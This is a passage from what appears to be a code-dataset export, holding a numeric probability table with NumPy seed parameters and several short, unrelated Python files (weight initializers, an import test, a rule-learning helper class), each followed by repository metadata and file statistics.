(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 134
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 135
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 136
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 137
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 138
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 139
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 140
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 141
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 142
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 143
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 144
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 145
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 146
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 147
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 148
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 149
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 150
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 151
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 152
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 153
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 154
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 155
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 156
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 157
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 158
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 159
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 160
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 161
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 162
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 163
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 164
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 165
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 166
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 167
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 168
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 169
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 170
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 171
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 172
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 173
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 174
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 175
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 176
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 177
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 178
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 179
)
"""
parameters for reproducibility. More information: https://numpy.org/doc/stable/reference/random/parallel.html
"""
# initial entropy
entropy = 8991598675325360468762009371570610170
# index for seed sequence child
child_seed_index = (
1, # 0
18, # 1
)
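These values plug into NumPy's `SeedSequence` machinery: feeding the recorded entropy back into `SeedSequence` and spawning children at the recorded indices reproduces the original random streams. A minimal sketch (the spawn count of 19 is illustrative, chosen only to cover the recorded child indices 1 and 18):

```python
import numpy as np

# Entropy recorded above; reusing it reproduces the exact same child seeds.
entropy = 8991598675325360468762009371570610170

root = np.random.SeedSequence(entropy)
# Spawn enough children to cover the recorded child_seed_index values.
children = root.spawn(19)

# A generator built from a specific child is fully deterministic.
rng = np.random.default_rng(children[18])
sample = rng.random(3)
```

Because spawning is deterministic for a fresh root, rebuilding the `SeedSequence` from the same entropy always yields the same children, which is what makes the experiment reproducible across runs and machines.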
| 278.986096 | 492 | 0.771809 | 32,987 | 260,852 | 6.102919 | 0.227423 | 0.354068 | 0.339763 | 0.643761 | 0.367485 | 0.360625 | 0.359751 | 0.359493 | 0.359493 | 0.359493 | 0 | 0.85143 | 0.09482 | 260,852 | 934 | 493 | 279.284797 | 0.001182 | 0.015377 | 0 | 0.200873 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.005459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
07e2d500a3c14d5b27e2a31a74185473841ac4b4 | 397 | py | Python | lab4/inits.py | GustavHenning/DeepLearning18 | 9489208a41822a41ff87af19dac9f06ad30ac3ea | [
"MIT"
] | null | null | null | lab4/inits.py | GustavHenning/DeepLearning18 | 9489208a41822a41ff87af19dac9f06ad30ac3ea | [
"MIT"
] | null | null | null | lab4/inits.py | GustavHenning/DeepLearning18 | 9489208a41822a41ff87af19dac9f06ad30ac3ea | [
"MIT"
] | null | null | null | import sys
import numpy as np
class Initializer:
def from_shape(self, shape):
print("Initializer is an interface.")
sys.exit(1)
pass
class Zeros(Initializer):
def from_shape(self, shape):
return np.zeros(shape, dtype=float)
class Xavier(Initializer):
def from_shape(self, shape):
return np.random.normal(0, np.sqrt(2 / (sum(shape))), shape)
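The `Xavier` rule above draws weights from a normal distribution with standard deviation `sqrt(2 / (fan_in + fan_out))`. A self-contained sketch of the same rule (the shapes are illustrative, not taken from the lab code):

```python
import numpy as np

def xavier_init(shape):
    # Glorot/Xavier normal initialization: std = sqrt(2 / (fan_in + fan_out))
    return np.random.normal(0, np.sqrt(2 / sum(shape)), shape)

w = xavier_init((50, 100))  # e.g. a 50x100 weight matrix
b = np.zeros((50, 1))       # biases start at zero, as Zeros.from_shape does
```

Scaling the variance by the sum of the layer's fan-in and fan-out keeps activation magnitudes roughly constant across layers at the start of training.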
| 22.055556 | 68 | 0.652393 | 55 | 397 | 4.654545 | 0.527273 | 0.164063 | 0.210938 | 0.269531 | 0.4375 | 0.4375 | 0.3125 | 0.3125 | 0 | 0 | 0 | 0.009836 | 0.231738 | 397 | 17 | 69 | 23.352941 | 0.829508 | 0 | 0 | 0.230769 | 0 | 0 | 0.070529 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0.076923 | 0.153846 | 0.153846 | 0.769231 | 0.076923 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 6 |
6af4bc0a0246e69913f87ed27bc81d0a0782ef65 | 61 | py | Python | spacetx_hca_flattener/test/test_import.py | spacetx/spacetx-hca-flattener | a75d6748a133498b2bcd93009888237754a5af7b | [
"MIT"
] | null | null | null | spacetx_hca_flattener/test/test_import.py | spacetx/spacetx-hca-flattener | a75d6748a133498b2bcd93009888237754a5af7b | [
"MIT"
] | null | null | null | spacetx_hca_flattener/test/test_import.py | spacetx/spacetx-hca-flattener | a75d6748a133498b2bcd93009888237754a5af7b | [
"MIT"
] | null | null | null | def test_import():
import spacetx_hca_flattener # noqa
| 20.333333 | 41 | 0.737705 | 8 | 61 | 5.25 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.196721 | 61 | 2 | 42 | 30.5 | 0.857143 | 0.065574 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 1 | 0 | 1.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ed146d135430f0711947398a4a62add689c3be98 | 538 | py | Python | src/skmultiflow/rules/attribute_expand_suggestion.py | lambertsbennett/scikit-multiflow | bc714fd5ee4f0a486adc00ec6ae39eafa64f81cc | [
"BSD-3-Clause"
] | 1 | 2020-04-16T10:17:03.000Z | 2020-04-16T10:17:03.000Z | src/skmultiflow/rules/attribute_expand_suggestion.py | lambertsbennett/scikit-multiflow | bc714fd5ee4f0a486adc00ec6ae39eafa64f81cc | [
"BSD-3-Clause"
] | null | null | null | src/skmultiflow/rules/attribute_expand_suggestion.py | lambertsbennett/scikit-multiflow | bc714fd5ee4f0a486adc00ec6ae39eafa64f81cc | [
"BSD-3-Clause"
] | 1 | 2019-09-26T02:49:25.000Z | 2019-09-26T02:49:25.000Z | class AttributeExpandSuggestion(object):
def __init__(self, att_idx, att_val, operator, resulting_class_distributions, merit):
self.resulting_class_distributions = resulting_class_distributions
self.merit = merit
self.att_idx = att_idx
self.att_val = att_val
self.operator = operator
def num_splits(self):
return len(self.resulting_class_distributions)
def resulting_class_distribution_from_split(self, split_idx):
return self.resulting_class_distributions[split_idx]
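For illustration, the suggestion holder can be exercised as follows; the class is restated so the sketch runs standalone, and the attribute index, operator, and class distributions are made-up values:

```python
# Restated from the class above so this sketch is self-contained.
class AttributeExpandSuggestion(object):
    def __init__(self, att_idx, att_val, operator, resulting_class_distributions, merit):
        self.resulting_class_distributions = resulting_class_distributions
        self.merit = merit
        self.att_idx = att_idx
        self.att_val = att_val
        self.operator = operator

    def num_splits(self):
        return len(self.resulting_class_distributions)

    def resulting_class_distribution_from_split(self, split_idx):
        return self.resulting_class_distributions[split_idx]

# Hypothetical binary split on attribute 2 at value 0.5: each dict maps
# class label -> observed count on that side of the split.
suggestion = AttributeExpandSuggestion(
    att_idx=2, att_val=0.5, operator="<=",
    resulting_class_distributions=[{0: 10, 1: 2}, {0: 3, 1: 15}],
    merit=0.42,
)
```

A rule learner would rank candidate suggestions by `merit` and expand the rule with the condition (`att_idx`, `operator`, `att_val`) of the best one.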
| 38.428571 | 89 | 0.745353 | 64 | 538 | 5.84375 | 0.3125 | 0.224599 | 0.360963 | 0.248663 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.19145 | 538 | 13 | 90 | 41.384615 | 0.85977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0 | 0.181818 | 0.545455 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
ed23c77bcdb97e86d91c9552f1ef5eaf16962513 | 21,563 | py | Python | pyevr/openapi_client/api/place_of_deliveries_api.py | thorgate/pyevr | 168f2e9459020212213ed0291882a285ebb53839 | [
"MIT"
